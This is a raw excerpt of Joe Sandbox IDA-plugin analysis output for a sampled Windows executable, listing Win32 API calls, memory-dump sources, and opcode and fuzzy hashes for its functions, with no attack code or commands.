                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • GetCaretPos.USER32(?), ref: 0040205E
                                                • ClientToScreen.USER32(00000000,?), ref: 004020AB
                                                • GetForegroundWindow.USER32 ref: 004020B1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 372862735d1f6fac371acd9ee7ebb02aa6fbddf4a07dee09bc64a1a5c49fdcf8
                                                • Instruction ID: f2461ba00a423ad0869799a376a608e4a3ff9ffb5e83cd1ad2d30ee074f94cb7
                                                • Opcode Fuzzy Hash: 372862735d1f6fac371acd9ee7ebb02aa6fbddf4a07dee09bc64a1a5c49fdcf8
                                                • Instruction Fuzzy Hash: 4C314371D00209AFC715EFAAC985CAFB7F8EF48304B1084AAE519EB351D675DE05CB90
                                                APIs
                                                  • Part of subcall function 00374154: _wcslen.LIBCMT ref: 00374159
                                                • _wcslen.LIBCMT ref: 003DE7F7
                                                • _wcslen.LIBCMT ref: 003DE80E
                                                • _wcslen.LIBCMT ref: 003DE839
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 003DE844
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$ExtentPoint32Text
                                                • String ID:
                                                • API String ID: 3763101759-0
                                                • Opcode ID: 747ca1ab431fc4905c0793c14d927fe9b626a0d14b74e32b326e8cebfa49f5bb
                                                • Instruction ID: c4079296698be3a3c2dbf661b9371066acaf508b28b61de6382a546343c005e4
                                                • Opcode Fuzzy Hash: 747ca1ab431fc4905c0793c14d927fe9b626a0d14b74e32b326e8cebfa49f5bb
                                                • Instruction Fuzzy Hash: 8521A372D00314AFDB12EFA8D982BAEBBF8EF45750F154065E804BF345D6749E418BA1
                                                APIs
                                                  • Part of subcall function 003D960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?), ref: 003D961B
                                                  • Part of subcall function 003D960C: lstrcpyW.KERNEL32(00000000,?,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D9641
                                                  • Part of subcall function 003D960C: lstrcmpiW.KERNEL32(00000000,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?), ref: 003D9672
                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D81B2
                                                • lstrcpyW.KERNEL32(00000000,?,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D81D8
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D8213
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: 47846aa450b0d9b330d69cae2f678a020b579305bdb87cba4de26847c544cbb3
                                                • Instruction ID: f18a01eab54ddc80626e4bc0d0b5796d144954695395cd15d4aab291546d776f
                                                • Opcode Fuzzy Hash: 47846aa450b0d9b330d69cae2f678a020b579305bdb87cba4de26847c544cbb3
                                                • Instruction Fuzzy Hash: CF11D33B600201ABCB166F74E845A7A77A9FF99760B50402BF946CB390EF31A911C794
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040866A
                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00408689
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004086A1
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003EC10A,00000000), ref: 004086CA
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID:
                                                • API String ID: 847901565-0
                                                • Opcode ID: ebbcc9b62084ad22c8ea28d972a99e270989b71a55f00fe172554d5d9050924e
                                                • Instruction ID: 1cbe517aceedd365546f18faf4a36a39bcedbb08780c9e241af41ac9bbca3f80
                                                • Opcode Fuzzy Hash: ebbcc9b62084ad22c8ea28d972a99e270989b71a55f00fe172554d5d9050924e
                                                • Instruction Fuzzy Hash: 5911A271A00215AFDB109F68CE04A6B3BA5AB45370F124B39F979EB2E0DB358911CB58
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d10c9f8a6d22d7ebe96222aa676cfbf2d8ab732cef6c383f3852281c4a30c8ec
                                                • Instruction ID: 88bf180d8fc561b06f3fe2e774e8016f0595ff51b1cadb71f124112339590fae
                                                • Opcode Fuzzy Hash: d10c9f8a6d22d7ebe96222aa676cfbf2d8ab732cef6c383f3852281c4a30c8ec
                                                • Instruction Fuzzy Hash: BB01ADB26096167EF622667D6CC1F27674DDF533B8B320329B631A51D2EA708C418560
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 003D22D7
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D22E9
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D22FF
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D231A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                APIs
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                • GetClientRect.USER32(?,?), ref: 0040A890
                                                • GetCursorPos.USER32(?), ref: 0040A89A
                                                • ScreenToClient.USER32(?,?), ref: 0040A8A5
                                                • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0040A8D9
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 003DEA29
                                                • MessageBoxW.USER32(?,?,?,?), ref: 003DEA5C
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003DEA72
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003DEA79
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00408792
                                                • ScreenToClient.USER32(?,?), ref: 004087AA
                                                • ScreenToClient.USER32(?,?), ref: 004087CE
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004087E9
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0037216C
                                                • SetTextColor.GDI32(?,?), ref: 00372176
                                                • SetBkMode.GDI32(?,00000001), ref: 00372189
                                                • GetStockObject.GDI32(00000005), ref: 00372191
                                                Similarity
                                                • API ID: Color$ModeObjectStockText
                                                • String ID:
                                                • API String ID: 4037423528-0
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 003CEBD6
                                                • GetDC.USER32(00000000), ref: 003CEBE0
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003CEC00
                                                • ReleaseDC.USER32(?), ref: 003CEC21
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 003CEBEA
                                                • GetDC.USER32(00000000), ref: 003CEBF4
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003CEC00
                                                • ReleaseDC.USER32(?), ref: 003CEC21
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0039E69D
                                                Strings
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: BuffCharUpper_wcslen
                                                • String ID: CALLARGARRAY
                                                • API String ID: 157775604-1150593374
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00404F7E
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00404F93
                                                Strings
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                APIs
                                                  • Part of subcall function 0037771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00377759
                                                  • Part of subcall function 0037771B: GetStockObject.GDI32(00000011), ref: 0037776D
                                                  • Part of subcall function 0037771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00377777
                                                • GetWindowRect.USER32(00000000,?), ref: 004040D9
                                                • GetSysColor.USER32(00000012), ref: 004040F3
                                                Strings
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003D25DC
                                                Strings
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 003D24D6
                                                Strings
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 3c79f8bca389c3fc87d54670743dd77e37a87007c2e9cae54fabae016ddb312d
                                                • Instruction ID: 796cc2f3411c121f7adf196e1f1d991165492a939d280d95ffb0eb63277cccbb
                                                • Opcode Fuzzy Hash: 3c79f8bca389c3fc87d54670743dd77e37a87007c2e9cae54fabae016ddb312d
                                                • Instruction Fuzzy Hash: F301FC72A0010567CB26EBA0D911FFFB7B89F55300F140017B84267382DB249E08C671
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 003D2558
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 7020e313a9e7a26c2cd7e498ef1fd119311f6d84f60ca3ceb3133f4d26014a58
                                                • Instruction ID: d3356822c86078378e5fe1b72edd215f4ed4727e15f83eff15c07794e831ce86
                                                • Opcode Fuzzy Hash: 7020e313a9e7a26c2cd7e498ef1fd119311f6d84f60ca3ceb3133f4d26014a58
                                                • Instruction Fuzzy Hash: 2601A772A4010567CB26EBA4E915FFFF7B99F26740F144016B44177386EA289F088671
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 003D2663
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: fc28bec0e417e569249336d086a23df2012ab9d232fccb9da11cafdce4bea715
                                                • Instruction ID: 3be0e03ab8fd137cab80d89bf589b8a2923aa46d4f3225fbb97285957bc711d7
                                                • Opcode Fuzzy Hash: fc28bec0e417e569249336d086a23df2012ab9d232fccb9da11cafdce4bea715
                                                • Instruction Fuzzy Hash: 7CF0F972A40215A7C726E7A4AC51FFFB778AF11710F040916B462673C2DBB498088664
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00444018,0044405C), ref: 00408B1E
                                                • CloseHandle.KERNEL32 ref: 00408B30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: \@D
                                                • API String ID: 3712363035-456115274
                                                • Opcode ID: c1eb662a6657570a45d406fd5c6d937d76e974d1a2edeb3ec3685b01f792e187
                                                • Instruction ID: 1f91f813065c6883ea3c41ad7a607fdf3f7a5ba4558f93a578b1ae26b0d31a21
                                                • Opcode Fuzzy Hash: c1eb662a6657570a45d406fd5c6d937d76e974d1a2edeb3ec3685b01f792e187
                                                • Instruction Fuzzy Hash: B0F05EB6940704BBF7206BA0AC46FB73A9CDB46751F004031BB08EA192D67A4C6492BC
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00402C8B
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00402C9E
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: ace7b865051b7b90475dba5a856b6d2ec1a20e065eacf387629a383d691dc2c9
                                                • Instruction ID: fd85acc2fa9cf60343d2ba5e5f3fc44f5de5762a89998ccbe9d6ef80b33420b3
                                                • Opcode Fuzzy Hash: ace7b865051b7b90475dba5a856b6d2ec1a20e065eacf387629a383d691dc2c9
                                                • Instruction Fuzzy Hash: FBD0A936784300BAF228B3B0ED0FFCA6A04AB40B00F000922724AAA1C0CAB0A801C688
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00402CCB
                                                • PostMessageW.USER32(00000000), ref: 00402CD2
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 259b0d884135d9435ba0666c0d05849a0e0585138cae55be32203862df2ff814
                                                • Instruction ID: 93904e0cadb13e02b698abd0cb8b1c5593b97f6ead4127b20c56c4caf3b1a81c
                                                • Opcode Fuzzy Hash: 259b0d884135d9435ba0666c0d05849a0e0585138cae55be32203862df2ff814
                                                • Instruction Fuzzy Hash: BDD0A9327C03007AF228B3B0ED0FFCA6A04AB44B00F0009227246AA1C0CAB0A801C68C
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 003AC233
                                                • GetLastError.KERNEL32 ref: 003AC241
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003AC29C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: 5a4666ec9c942661e3c34762ce5696dee0d7ffc795c6331bb368b1d4c9512895
                                                • Instruction ID: ee2d59a670d31bbb92f8e98643a68ee8496fdc566fdc0e79b1a6fa006af5f5ec
                                                • Opcode Fuzzy Hash: 5a4666ec9c942661e3c34762ce5696dee0d7ffc795c6331bb368b1d4c9512895
                                                • Instruction Fuzzy Hash: 7941B631610206EFCF279FE9C844BBA7BA9EF47710F265569E859AB1A1DB308D01C790